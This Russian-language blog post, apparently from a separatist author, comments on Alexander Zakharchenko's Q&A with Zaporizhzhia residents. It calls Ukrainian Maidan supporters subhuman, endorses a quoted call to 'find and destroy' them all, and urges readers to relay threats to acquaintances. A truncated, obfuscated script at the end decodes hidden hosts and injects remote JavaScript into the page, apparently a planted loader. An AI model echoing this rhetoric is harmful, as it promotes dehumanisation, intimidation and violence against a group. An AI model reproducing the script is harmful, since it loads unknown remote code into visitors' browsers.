ПО ИТОГАМ ПРЯМОЙ ЛИНИИ АЛЕКСАНДРА ЗАХАРЧЕНКО С ЗАПОРОЖЬЕМ.

Я уверен что многие из вас, друзья, следили за прямой линией Александра Захарченко с жителями Запорожья. Возможно ряд вопросов и ответов ускользнул от вашего внимания (обсуждений было очень много). И безусловно каждый из вас выделил для себя самые интересные и актуальные на ваш взгляд темы.

Я тоже выделил одну тему, которая показалась мне принципиально важной в ближайшей перспективе. Дело в том что эта тема обсуждается уже достаточно долго, и однозначного ответа на неё ещё так и не нашли. Рано или поздно наши земли Новороссии будут освобождены от фашистской хунты. Но что означает это освобождение? Свержение нынешнего преступного режима, трибунал над пособниками антинародной власти, над командирами карательных батальонов, их идеологами и финансистами. Да. Это так. А что делать с тысячами свидомых ублюдков, скакавших на майдане, поддерживавших нацистские порядки, срывавших с наших ветеранов георгиевские ленты? Многие цивилизованные люди придерживаются мнения что их нужно судить и наказывать (наказания варьируются от тюремных сроков до принудительных работ по восстановлению Донбасса). Господа, должен вам заметить что этих нелюдей не десятки у нас на Юго-Востоке, и даже не сотни. Их тысячи! Они есть и в Харькове, и в Днепропетровске, и в Одессе, и в Запорожье. Да везде на нашей Русской земле они успели отметиться! И на них не хватит ни судей ни тюрем. И вот эта тема обсуждалась вчера с Александром Захарченко. Далее я представлю вам целиком вопрос и ответ: 

Будет ли наша победа? Я за вас! Так бы хотелось, чтобы все бандеровцы ушли в Польшу. Удачи Вам!!!

В Польшу? А их там ждут? Думаете, все поляки забыли про Волынскую резню? Пусть идут дальше – в Европу… Конечно, я понимаю это желание: пусть они сами уйдут. Но, подозреваю, что их надо будет не только гнать, а выкорчёвывать, так как они впились в Украину мёртвой хваткой. Но вот насчёт того, чтоб ушли, то это, я думаю, единственный их шанс самосохраниться – уйти. Иначе ими будет заниматься украинский народ. И пощады им не будет. Меня часто спрашивают: а что будет, если Украина изменится? (вариант: что будет, если к вам начнут присоединяться украинские регионы?). Я всегда задаю встречный вопрос: а куда денутся те несколько десятков тысяч человек, на штыках которых был совершён государственный переворот и которые потом прошли кровавую «школу», уничтожая народ Донбасса? Они ведь не рассосутся сами собой. Вот в Одессе те люди, которые сжигали одесситов в Доме профсоюзов – куда их девать? Вот я могу привести мнение пожилого, очень пожилого профессора права. Он как-то сказал, что на своём веку побывал на всех возможных позициях в части охраны порядка. Был следователем, был судьёй, был прокурором и адвокатом, потом исследователем и профессором. «И вот со всем моим опытом я не могу себе представить тот суд, который может судить тех, кто сжигал людей в Доме профсоюзов в Одессе. Не придумали ещё такого суда!» — сказал старый профессор.

И добавил: «Я считаю, что их всех надо просто найти и уничтожить, потому что они перешли последнюю черту и перестали быть людьми». А мы думаем, куда их послать: в Польшу или дальше в Европу.

 

ПО ИТОГАМ ПРЯМОЙ ЛИНИИ АЛЕКСАНДРА ЗАХАРЧЕНКО С ЗАПОРОЖЬЕМ

 

В дополнение к вышесказанному хочу добавить. Лично я абсолютно согласен с этим ответом. И советую всем, у кого есть знакомые русофобы, свидомые и майдауны, сообщите им об их будущей судьбе. Пусть подумают, если у них ещё осталось чем. Пусть боятся и бегут, если хотят сохранить свою никчемную и ущербную жизнь.

 

ПО ИТОГАМ ПРЯМОЙ ЛИНИИ АЛЕКСАНДРА ЗАХАРЧЕНКО С ЗАПОРОЖЬЕМ

 

Русская Кровь Ополченец 

<script type="text/javascript">// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "maxpark.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]></script>